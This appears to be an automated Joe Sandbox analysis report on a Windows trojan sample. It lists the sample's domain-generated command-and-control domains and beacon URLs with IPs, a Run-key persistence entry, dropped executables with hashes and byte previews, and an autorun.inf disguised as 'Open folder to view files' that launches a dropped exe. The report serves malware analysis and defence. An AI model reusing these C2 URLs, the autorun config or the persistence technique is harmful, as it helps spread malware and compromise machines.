                        unknowntrue
                          unknown
                          namrhepwnn.us
                          unknown
                          unknowntrue
                            unknown
                            shpqsasmrn.biz
                            unknown
                            unknowntrue
                              unknown
                              shmsemwams.biz
                              unknown
                              unknowntrue
                                unknown
                                mwpmmeshma.in
                                unknown
                                unknowntrue
                                  unknown
                                  memmshersa.in
                                  unknown
                                  unknowntrue
                                    unknown
                                    wwqeemeesr.in
                                    unknown
                                    unknowntrue
                                      unknown
                                      rwqmwaahsa.org
                                      unknown
                                      unknowntrue
                                        unknown
                                        prnaqpsqar.in
                                        unknown
                                        unknowntrue
                                          unknown
                                          raheepmpnn.org
                                          unknown
                                          unknowntrue
                                            unknown
                                            hmaeshmwmh.net
                                            unknown
                                            unknowntrue
                                              unknown
                                              hsqrpmnhwa.net
                                              unknown
                                              unknowntrue
                                                unknown
                                                nnrhanmhwn.us
                                                unknown
                                                unknowntrue
                                                  unknown
                                                  nhmqhmsrph.us
                                                  unknown
                                                  unknowntrue
                                                    unknown
                                                    anmmemmqms.com
                                                    unknown
                                                    unknowntrue
                                                      unknown
                                                      swrhaapnnr.biz
                                                      unknown
                                                      unknowntrue
                                                        unknown
                                                        qmmmshpqan.info
                                                        unknown
                                                        unknowntrue
                                                          unknown
                                                          hpeemnapan.net
                                                          unknown
                                                          unknowntrue
                                                            unknown
                                                            ampsqhrras.com
                                                            unknown
                                                            unknowntrue
                                                              unknown
                                                              shwwnharma.biz
                                                              unknown
                                                              unknowntrue
                                                                unknown
                                                                qpnrsrhean.info
                                                                unknown
                                                                unknowntrue
                                                                  unknown
                                                                  sephpsappn.biz
                                                                  unknown
                                                                  unknowntrue
                                                                    unknown
                                                                    rwneseeers.org
                                                                    unknown
                                                                    unknowntrue
                                                                      unknown
                                                                      snshrmsmmh.biz
                                                                      unknown
                                                                      unknowntrue
                                                                        unknown
                                                                        NameMaliciousAntivirus DetectionReputation
                                                                        http://pqarseshhn.in/imgs/krewa/nqxa.php?id=f21eztiy&s5=3159&lip=192.168.2.7&win=Unktrue
                                                                        • Avira URL Cloud: malware
                                                                        unknown
                                                                        http://enahmnhqah.ws/imgs/krewa/nqxa.php?id=f21eztiy&s5=3159&lip=192.168.2.7&win=Unktrue
                                                                        • Avira URL Cloud: malware
                                                                        unknown
                                                                        http://rmhhhmswqh.org/imgs/krewa/nqxa.php?id=f21eztiy&s5=3159&lip=192.168.2.7&win=Unktrue
                                                                        • Avira URL Cloud: malware
                                                                        unknown
                                                                        http://meahewphwa.in/imgs/krewa/nqxa.php?id=f21eztiy&s5=3159&lip=192.168.2.7&win=Unktrue
                                                                        • Avira URL Cloud: malware
                                                                        unknown
                                                                        http://hmpasnpmas.net/imgs/krewa/nqxa.php?id=f21eztiy&s5=3159&lip=192.168.2.7&win=Unktrue
                                                                        • Avira URL Cloud: malware
                                                                        unknown
                                                                        http://whenaeqsar.in/imgs/krewa/nqxa.php?id=f21eztiy&s5=3159&lip=192.168.2.7&win=Unktrue
                                                                        • Avira URL Cloud: malware
                                                                        unknown
                                                                        • No. of IPs < 25%
                                                                        • 25% < No. of IPs < 50%
                                                                        • 50% < No. of IPs < 75%
                                                                        • 75% < No. of IPs
                                                                        IPDomainCountryFlagASNASN NameMalicious
                                                                        64.70.19.203
                                                                        enahmnhqah.wsUnited States
                                                                        3561CENTURYLINK-LEGACY-SAVVISUStrue
                                                                        107.6.74.76
                                                                        whenaeqsar.inUnited States
                                                                        29791VOXEL-DOT-NETUStrue
                                                                        173.231.184.124
                                                                        hmpasnpmas.netUnited States
                                                                        29791VOXEL-DOT-NETUStrue
                                                                        173.231.189.15
                                                                        pqarseshhn.inUnited States
                                                                        29791VOXEL-DOT-NETUStrue
                                                                        199.21.76.81
                                                                        meahewphwa.inUnited States
                                                                        29791VOXEL-DOT-NETUStrue
                                                                        72.251.233.245
                                                                        rmhhhmswqh.orgUnited States
                                                                        29791VOXEL-DOT-NETUStrue
                                                                        IP
                                                                        192.168.2.1
                                                                        Joe Sandbox Version:36.0.0 Rainbow Opal
                                                                        Analysis ID:740373
                                                                        Start date and time:2022-11-07 22:11:49 +01:00
                                                                        Joe Sandbox Product:CloudBasic
                                                                        Overall analysis duration:0h 9m 58s
                                                                        Hypervisor based Inspection enabled:false
                                                                        Report type:full
                                                                        Sample file name:GxELazkKkG.exe
                                                                        Cookbook file name:default.jbs
                                                                        Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                        Number of analysed new started processes analysed:23
                                                                        Number of new started drivers analysed:0
                                                                        Number of existing processes analysed:0
                                                                        Number of existing drivers analysed:0
                                                                        Number of injected processes analysed:0
                                                                        Technologies:
                                                                        • HCA enabled
                                                                        • EGA enabled
                                                                        • HDC enabled
                                                                        • AMSI enabled
                                                                        Analysis Mode:default
                                                                        Analysis stop reason:Timeout
                                                                        Detection:MAL
                                                                        Classification:mal100.troj.evad.winEXE@23/15@35/7
                                                                        EGA Information:
                                                                        • Successful, ratio: 100%
                                                                        HDC Information:
                                                                        • Successful, ratio: 73.9% (good quality ratio 46.3%)
                                                                        • Quality average: 44.6%
                                                                        • Quality standard deviation: 41.1%
                                                                        HCA Information:
                                                                        • Successful, ratio: 100%
                                                                        • Number of executed functions: 64
                                                                        • Number of non-executed functions: 121
                                                                        Cookbook Comments:
                                                                        • Found application associated with file extension: .exe
                                                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                                        • Excluded IPs from analysis (whitelisted): 20.42.73.29
                                                                        • Excluded domains from analysis (whitelisted): client.wns.windows.com, fs.microsoft.com, login.live.com, blobcollector.events.data.trafficmanager.net, onedsblobprdeus15.eastus.cloudapp.azure.com, watson.telemetry.microsoft.com
                                                                        • Not all processes where analyzed, report is missing behavior information
                                                                        • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                                                        • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                                        • VT rate limit hit for: GxELazkKkG.exe
                                                                        TimeTypeDescription
                                                                        22:12:47API Interceptor35x Sleep call for process: GxELazkKkG.exe modified
                                                                        22:12:51AutostartRun: HKLM\Software\Microsoft\Windows\CurrentVersion\Run ctfmen C:\Windows\system32\ctfmen.exe
                                                                        22:13:00API Interceptor1x Sleep call for process: WerFault.exe modified
                                                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                        64.70.19.203Readme.exeGet hashmaliciousBrowse
                                                                        • ersaenrnwh.ws/imgs/krewa/nqxa.php?id=50f5gzcu&s5=3159&lip=192.168.2.5&win=Unk
                                                                        EAfIchN1gN.exeGet hashmaliciousBrowse
                                                                        • ehmpeseeaa.ws/imgs/krewa/nqxa.php?id=5143sudk&s5=3159&lip=192.168.2.4&win=Unk
                                                                        144C0621CA5ECB402DE01D8F10044F92A2EF917522E4B.exeGet hashmaliciousBrowse
                                                                        • xircus.ws/kin/logout.php
                                                                        Br6Pmt0MiZ.exeGet hashmaliciousBrowse
                                                                        • thaus.ws/6
                                                                        R5JbUb3muW.exeGet hashmaliciousBrowse
                                                                        • thaus.ws/6
                                                                        kmHFEwF36g.exeGet hashmaliciousBrowse
                                                                        • thaus.ws/1
                                                                        VkTXaNHTs6.exeGet hashmaliciousBrowse
                                                                        • eaffuebudbeudbbk.ws/6
                                                                        wNtMSZRvzI.exeGet hashmaliciousBrowse
                                                                        • eafuebdbedbedggk.ws/4
                                                                        y7ddF1vGqA.exeGet hashmaliciousBrowse
                                                                        • deauduafzgezzfgk.ws/3
                                                                        6FRRo6QFF2.exeGet hashmaliciousBrowse
                                                                        • wduufbaueeubffgu.ws/5
                                                                        Photo-149-101.jpg.exeGet hashmaliciousBrowse
                                                                        • 304049943.ws/mailer/3
                                                                        winsvcs.exeGet hashmaliciousBrowse
                                                                        • 304049943.ws/mailer/3
                                                                        Photo-137-158.jpg.exeGet hashmaliciousBrowse
                                                                        • 304049943.ws/mailer/3
                                                                        9v7gUCpZOr.exeGet hashmaliciousBrowse
                                                                        • eaffuebudbeudbbu.ws/2
                                                                        1rP65UzlyY.exeGet hashmaliciousBrowse
                                                                        • eaffuebudbeudbbu.ws/5
                                                                        JAGk3xeQ5I.exeGet hashmaliciousBrowse
                                                                        • geueudusl.ws/vnc/2
                                                                        SecuriteInfo.com.Trojan.Siggen10.14421.6375.exeGet hashmaliciousBrowse
                                                                        • fheuhdwdzwgzdggu.ws/2
                                                                        SecuriteInfo.com.Trojan.Siggen10.14421.24699.exeGet hashmaliciousBrowse
                                                                        • wduufbaueeubffgr.ws/2
                                                                        jHbg4HhuFN.exeGet hashmaliciousBrowse
                                                                        • deauduafzgezzfgr.ws/5
                                                                        Olalq9sdOF.exeGet hashmaliciousBrowse
                                                                        • tpleflpokadkeoot.ws/pe/1
                                                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                        rmhhhmswqh.orgkZjJxHu8z1.exeGet hashmaliciousBrowse
                                                                        • 72.251.233.245
                                                                        Readme.exeGet hashmaliciousBrowse
                                                                        • 72.251.233.245
                                                                        whenaeqsar.inkZjJxHu8z1.exeGet hashmaliciousBrowse
                                                                        • 107.6.74.76
                                                                        Readme.exeGet hashmaliciousBrowse
                                                                        • 107.6.74.76
                                                                        meahewphwa.inkZjJxHu8z1.exeGet hashmaliciousBrowse
                                                                        • 199.21.76.81
                                                                        Readme.exeGet hashmaliciousBrowse
                                                                        • 199.21.76.81
                                                                        pqarseshhn.inkZjJxHu8z1.exeGet hashmaliciousBrowse
                                                                        • 173.231.189.15
                                                                        Readme.exeGet hashmaliciousBrowse
                                                                        • 173.231.189.15
                                                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                        CENTURYLINK-LEGACY-SAVVISUSxd.x86Get hashmaliciousBrowse
                                                                        • 206.155.137.17
                                                                        ZBfaaLcshZ.exeGet hashmaliciousBrowse
                                                                        • 192.252.154.18
                                                                        yWTISMtqlx.elfGet hashmaliciousBrowse
                                                                        • 206.156.198.167
                                                                        ZIvMmZpdrA.elfGet hashmaliciousBrowse
                                                                        • 208.160.94.42
                                                                        wHLmHiPakK.elfGet hashmaliciousBrowse
                                                                        • 208.135.222.44
                                                                        uK22wlqTzj.elfGet hashmaliciousBrowse
                                                                        • 208.161.73.104
                                                                        M1yzX4ocBh.elfGet hashmaliciousBrowse
                                                                        • 206.129.80.13
                                                                        S0JVZh7J56.elfGet hashmaliciousBrowse
                                                                        • 206.156.198.156
                                                                        3FZqnQXmtj.elfGet hashmaliciousBrowse
                                                                        • 206.114.194.69
                                                                        S4af9DDP83.elfGet hashmaliciousBrowse
                                                                        • 205.136.0.253
                                                                        aMLjTIhBvevLGx.dll.dllGet hashmaliciousBrowse
                                                                        • 64.209.239.229
                                                                        malw-20210521-bkp.elfGet hashmaliciousBrowse
                                                                        • 64.242.67.79
                                                                        q26m5DQQGi.elfGet hashmaliciousBrowse
                                                                        • 208.163.120.112
                                                                        rsWMgMBYvG.elfGet hashmaliciousBrowse
                                                                        • 208.170.226.176
                                                                        4xPh9XYemw.elfGet hashmaliciousBrowse
                                                                        • 207.49.11.9
                                                                        DBT6f8bOJY.elfGet hashmaliciousBrowse
                                                                        • 204.188.21.111
                                                                        666.x86Get hashmaliciousBrowse
                                                                        • 206.29.242.176
                                                                        7X71oZ4u45.elfGet hashmaliciousBrowse
                                                                        • 167.216.224.88
                                                                        y2cMH4I4yS.elfGet hashmaliciousBrowse
                                                                        • 206.129.251.165
                                                                        Readme.exeGet hashmaliciousBrowse
                                                                        • 64.70.19.203
                                                                        No context
                                                                        No context
                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):65536
                                                                        Entropy (8bit):0.938194810840334
                                                                        Encrypted:false
                                                                        SSDEEP:192:ggRTwkVKGNHBUZMXQjDh4uY/u7sQOS274It2:gMTwkVKGdBUZMXQjA/u7sQOX4It2
                                                                        MD5:9B2591D9363AD55BAAEAC8E6D47927BB
                                                                        SHA1:37CF5AF0AE07E3FF28E294124C1098037532A0BF
                                                                        SHA-256:AABB14DC1AB8A82E70DFBEF042C4A7112E5CA6A63ECAE529FAAFB31284FC69BF
                                                                        SHA-512:8A5CF711A02BEC79C7F156798D28CBCC162B2F42DF946560537CD4B63C926679620A3768C51C73D853B0A8165DF15C3AEA3FEE885CB1C5D366A0C7DCE73DD691
                                                                        Malicious:false
                                                                        Reputation:low
                                                                        Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.1.2.3.6.1.5.7.6.2.4.2.4.3.7.3.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.1.2.3.6.1.5.7.8.4.4.5.5.9.5.6.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.3.8.e.b.f.2.2.-.c.6.b.4.-.4.4.8.8.-.9.5.f.0.-.5.c.e.6.0.a.c.4.c.b.c.4.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.7.f.b.5.7.e.f.f.-.d.d.5.7.-.4.1.f.3.-.b.4.7.1.-.2.1.5.a.a.e.6.f.4.9.2.5.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.s.m.n.s.s...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.7.9.0.-.0.0.0.1.-.0.0.1.a.-.8.4.d.8.-.7.e.1.f.3.9.f.3.d.8.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.1.2.b.7.8.f.9.d.8.a.9.9.e.8.7.4.e.e.0.0.d.c.f.1.0.e.c.3.7.2.6.a.0.0.0.0.f.f.f.f.!.0.0.0.0.c.2.4.1.d.c.d.6.2.0.a.d.4.f.1.8.8.e.3.c.9.d.0.e.4.6.f.2.9.1.1.9.5.c.f.2.0.4.b.3.!.s.m.n.s.s...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.1.9.7.0././.
                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                        File Type:Mini DuMP crash report, 14 streams, Tue Nov 8 06:12:57 2022, 0x1205a4 type
                                                                        Category:dropped
                                                                        Size (bytes):107952
                                                                        Entropy (8bit):2.0985016601862143
                                                                        Encrypted:false
                                                                        SSDEEP:768:JMH6J0xPB7h6zMSr/PIMVqut84kMwF2Izi2:K6NlVqut84kRQIW2
                                                                        MD5:782A4A5016CD68DD45253D7BC569F555
                                                                        SHA1:9C6F823C672094257916635FF98691F1F50C5123
                                                                        SHA-256:00F0C42E860DFEFAFEDC486BA048EBE4510554EC5156C84DF66E0AEAD3924A59
                                                                        SHA-512:D02FF0B33955B9FF5FF1FE508BE14660B9B7782700645E976EB11BF33791EE80D8B39A607BE38DFA03BA8B2F27BE79942D1EF421B3A90A97A5035A2E3727C1EE
                                                                        Malicious:false
                                                                        Reputation:low
                                                                        Preview:MDMP....... .......i.ic.........................................E..........T.......8...........T............7...m...........................................................................................U...........B....... ......GenuineIntelW...........T..........._.ic.............................0..2...............P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.....................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                        File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):8282
                                                                        Entropy (8bit):3.6938011895736373
                                                                        Encrypted:false
                                                                        SSDEEP:192:Rrl7r3GLNiGjS646YJ56j5ogmfPSEE0CprD89b3qsf0v9m:RrlsNiIS646YX6j5ogmfPSEx3JfR
                                                                        MD5:3933CBABF80BD394BE354A221CC1A62F
                                                                        SHA1:13A77FB19C43EE0A2776581D7054CD457442DA49
                                                                        SHA-256:208F5EB41F279B88F3817E2DA95B5A7E45F95703565FDBA55BBF1E22EC5AE18E
                                                                        SHA-512:FE961FB020F83583970D1434C6EAD058B4EBE2D281C661E77F93903A8804C122B521C441608410AC74909D1FF815360331AC48DE30863FD747AD656E5AC4B097
                                                                        Malicious:false
                                                                        Reputation:low
                                                                        Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.0.3.2.<./.P.i.d.>.......
                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):4578
                                                                        Entropy (8bit):4.458521126937769
                                                                        Encrypted:false
                                                                        SSDEEP:48:cvIwSD8zs0JgtWI9b7Wgc8sqYjB8fm8M4J5vZFc+q8gfqqA3pDd:uITfyUKgrsqYaJJgLqh3pDd
                                                                        MD5:A9A97EE9DF83348E09AD2F78EEE29408
                                                                        SHA1:4E5BD09A610E01E66F09CE84821FB1773C974DB2
                                                                        SHA-256:A305C1D4542D8E411EA08BA7C0DE953D37C5F1BFCCB548127883763776B25DC9
                                                                        SHA-512:2175395DF0E8E75F4C237E2FC28B88CA59E4428433AC32AB8ED375AFE861DBD6C60596810BC9F0040A5C49E39EDF4ACE0849AC285AFAE57CE28585AE517AEEB3
                                                                        Malicious:false
                                                                        Reputation:low
                                                                        Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1770683" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                                                        Process:C:\Windows\System32\svchost.exe
                                                                        File Type:XML 1.0 document, ASCII text, with very long lines (2494), with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):2494
                                                                        Entropy (8bit):5.2422346795166614
                                                                        Encrypted:false
                                                                        SSDEEP:24:2dS48pX4y/DvKWDkQpy3X8ICDKbqTETBMjT52YjPkEqXpnBfKFXRGcp/BzQF7MNm:cAn/TLtTpIhdOEcp/Bum2SkC9+TREs
                                                                        MD5:E9DF6C9BB6062F2F420AE6B0800D72E2
                                                                        SHA1:7FF4694F497FFA845FCC2F0BCDC847AC30329B6E
                                                                        SHA-256:E8E5AEB4679AD05DEE5C7E68450542A281DAC31153C21BE2FB464CE544B87D83
                                                                        SHA-512:2C8ACC3756B6494998346EA552BF1E17EC68C295C2EC0583FEB25D825CC756722148B1EEBA4C003B9CD1DA68F52B9F33589CED2670FF252D0EF66A3320646320
                                                                        Malicious:false
                                                                        Preview:<?xml version="1.0" encoding="UTF-8"?><updateStore><sessionVariables><permanent><AUOptions dataType="3">1</AUOptions><AllowMUUpdateService dataType="3">0</AllowMUUpdateService><AreUpdatesPausedByPolicy dataType="11">False</AreUpdatesPausedByPolicy><AttentionRequiredReason dataType="19">0</AttentionRequiredReason><CurrentState dataType="19">1</CurrentState><FirstScanAttemptTime dataType="21">132399997803468014</FirstScanAttemptTime><FlightEnabled dataType="3">0</FlightEnabled><LastError dataType="19">0</LastError><LastErrorState dataType="19">0</LastErrorState><LastErrorStateType dataType="11">False</LastErrorStateType><LastMeteredScanTime dataType="21">132399997803624279</LastMeteredScanTime><LastScanAttemptTime dataType="21">132399997803468014</LastScanAttemptTime><LastScanDeferredReason dataType="19">1</LastScanDeferredReason><LastScanDeferredTime dataType="21">133051626335567089</LastScanDeferredTime><LastScanFailureError dataType="3">-2147023838</LastScanFailureError><LastScanFailu
                                                                        Process:C:\Windows\System32\svchost.exe
                                                                        File Type:XML 1.0 document, ASCII text, with very long lines (2494), with no line terminators
                                                                        Category:modified
                                                                        Size (bytes):2494
                                                                        Entropy (8bit):5.2422346795166614
                                                                        Encrypted:false
                                                                        SSDEEP:24:2dS48pX4y/DvKWDkQpy3X8ICDKbqTETBMjT52YjPkEqXpnBfKFXRGcp/BzQF7MNm:cAn/TLtTpIhdOEcp/Bum2SkC9+TREs
                                                                        MD5:E9DF6C9BB6062F2F420AE6B0800D72E2
                                                                        SHA1:7FF4694F497FFA845FCC2F0BCDC847AC30329B6E
                                                                        SHA-256:E8E5AEB4679AD05DEE5C7E68450542A281DAC31153C21BE2FB464CE544B87D83
                                                                        SHA-512:2C8ACC3756B6494998346EA552BF1E17EC68C295C2EC0583FEB25D825CC756722148B1EEBA4C003B9CD1DA68F52B9F33589CED2670FF252D0EF66A3320646320
                                                                        Malicious:false
                                                                        Preview:<?xml version="1.0" encoding="UTF-8"?><updateStore><sessionVariables><permanent><AUOptions dataType="3">1</AUOptions><AllowMUUpdateService dataType="3">0</AllowMUUpdateService><AreUpdatesPausedByPolicy dataType="11">False</AreUpdatesPausedByPolicy><AttentionRequiredReason dataType="19">0</AttentionRequiredReason><CurrentState dataType="19">1</CurrentState><FirstScanAttemptTime dataType="21">132399997803468014</FirstScanAttemptTime><FlightEnabled dataType="3">0</FlightEnabled><LastError dataType="19">0</LastError><LastErrorState dataType="19">0</LastErrorState><LastErrorStateType dataType="11">False</LastErrorStateType><LastMeteredScanTime dataType="21">132399997803624279</LastMeteredScanTime><LastScanAttemptTime dataType="21">132399997803468014</LastScanAttemptTime><LastScanDeferredReason dataType="19">1</LastScanDeferredReason><LastScanDeferredTime dataType="21">133051626335567089</LastScanDeferredTime><LastScanFailureError dataType="3">-2147023838</LastScanFailureError><LastScanFailu
                                                                        Process:C:\Users\user\Desktop\GxELazkKkG.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):4160
                                                                        Entropy (8bit):6.509439391174932
                                                                        Encrypted:false
                                                                        SSDEEP:96:LEIdSLQPZARC3dCE8Y0Jw5NL6EVwHHKg2:4swdRCNCE8YPWowHHK7
                                                                        MD5:BEFB073B1AE52E909D4EA54A5251185D
                                                                        SHA1:C5605D11DB50A20BE7CC13E95D75C29C61D876AF
                                                                        SHA-256:108663AFE560396A0F868D5C3547231CF67F4C8789D4EE6922D3386F64B85C67
                                                                        SHA-512:1EE72018DEB97A71000995270F7623315662B45C9D3DE5DEDF1A627E49F8A00D576F7FD17B21102CDF9DEB150D2DEFA1E47D1C8905F4CAEBB066D4DAE5AC71C3
                                                                        Malicious:true
                                                                        Antivirus:
                                                                        • Antivirus: Avira, Detection: 100%
                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                        Preview:MZ......................@.......................................................................................................PE..L......................8.........`.......p........@........................................... .....................................................................................................................................................5341ganw.`..............................5381kecv.....p......................@...5173uvsz@.......@...................@...........!....U6..72.*S..........&.......U.....]..E.1.u...1..=....w....C=..r[.....$.1.T$>...........tz..t............FQ..]..I....~t.wJ=.....=.. ?..[=..u.c...t.Y3j..c.=.,.?.o..u...D/....v...s......JS...3[..D0(R.c.07W,e.SL.. Fm..p........'OS~.{.P$-..@.$t.,...k...E.-.D... .l.$s@@T...........d4....d...w..-...Q.....G...t. .k......@0.Q9,+....#.t(P.~......7$i....}.......l.....g...I....".&.m..X|...7,d.;....o.O........L....!..&?.... .|.s.%]..t&....]..?]i.|...U...p.S..M.........8.t.B....r..9...:.
                                                                        Process:C:\Users\user\Desktop\GxELazkKkG.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):94062
                                                                        Entropy (8bit):6.947832567169458
                                                                        Encrypted:false
                                                                        SSDEEP:1536:5x0WI0FsWrIsOQOWEzIxb0pAYu7AOPloWUIBKJ99KYTjipvF2a:5OByRtNOWEkxgqYZOt1UIoHsYvQd2a
                                                                        MD5:CB66C7C2135BF18590FD0775F6DD9ECA
                                                                        SHA1:C241DCD620AD4F188E3C9D0E46F291195CF204B3
                                                                        SHA-256:5F67E9F0AF4D16E2C9714239DEB2A169C546F07FCBAF518CC1840DAD1B49F9B1
                                                                        SHA-512:9A0560159B2E09A2E756144EF34645340F8E9E157428A47E127F63EE56718C24E0D1631467162D5879705A861031F88BE2E2B8C6AEEBEEE8FBA08FE38938B555
                                                                        Malicious:true
                                                                        Antivirus:
                                                                        • Antivirus: Avira, Detection: 100%
                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                        Preview:MZ......................@.......................................................................................................PE..L......................8.........p...l.......p....@........................................... ..............................u.......p..............................................................................................................k29dbxfe.p..............................49jcyvnd............................@...5053anko.....p......................@...........!....d..V^.$..I......n...&.......U.....]..E.1.u...1..=....w....C=..r[.....$.1.T$>.....\.....tz..t............FQ..]..I....~t.wJ=.....=..6?..[=..u.c...t..{7kNj..c.=.,......u...D/.:w......v..#...l.S.V..{.#.S0(..m.R.W.?.e.[.m.SLt.F%m{...Z........'...B.OSP$-..@..=..r{&.,...EE.-....D....$s@A....T.............0.A.d..-.......{....G...t. .....}..@0.Q...+#.t(.n.#P......./..7i.........ka.........~I+....6"..3`..N.....fa.4;@....a............&?...........%]..t&..f.{C.?]..}.........
                                                                        Process:C:\Users\user\Desktop\GxELazkKkG.exe
                                                                        File Type:ASCII text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):26
                                                                        Entropy (8bit):3.95006375643621
                                                                        Encrypted:false
                                                                        SSDEEP:3:ggPYV:rPYV
                                                                        MD5:187F488E27DB4AF347237FE461A079AD
                                                                        SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                        SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                        SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                        Malicious:true
                                                                        Preview:[ZoneTransfer]....ZoneId=0
                                                                        Process:C:\Users\user\Desktop\GxELazkKkG.exe
                                                                        File Type:Microsoft Windows Autorun file
                                                                        Category:modified
                                                                        Size (bytes):183
                                                                        Entropy (8bit):4.93796082425488
                                                                        Encrypted:false
                                                                        SSDEEP:3:It1WN0aRQEZreHwcy/9RfyCtxWaFkjIjm5fHq4xm5fYTVuCWEZri/Qfn:e1WfRQq8EKCtxWaFiIS5fnU58uCrmg
                                                                        MD5:8CDAF73742ACBF5317BB54F9196E0367
                                                                        SHA1:005796127393C91ED38C7E5461C842D3F8A6B43C
                                                                        SHA-256:7B0BCCD354BB9D7AC78221963997B4D1863B3E2261C322E201F55CC19A869247
                                                                        SHA-512:68F57A1B11BAC66BDD75E8DC405D4F395C111D80F8B844C9E74698962B27E9C3D57B04969E7BAD136606659FE6343432E7B7D4E8348CD4C65F62322EA82880AB
                                                                        Malicious:true
                                                                        Antivirus:
                                                                        • Antivirus: Avira, Detection: 100%
                                                                        Preview:[autorun]..shellexecute=g469lovw.exe..icon=%SystemRoot%\system32\SHELL32.dll,4..action=Open folder to view files..shell\default=Open..shell\default\command=g469lovw.exe..shell=default
                                                                        Process:C:\Users\user\Desktop\GxELazkKkG.exe
